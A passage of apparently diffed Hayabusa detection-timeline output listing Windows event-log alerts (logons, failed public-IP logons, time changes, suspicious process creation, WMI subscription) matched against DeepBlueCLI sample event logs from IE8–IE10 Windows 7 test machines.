0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:15:39.306 +09:00,IE9Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 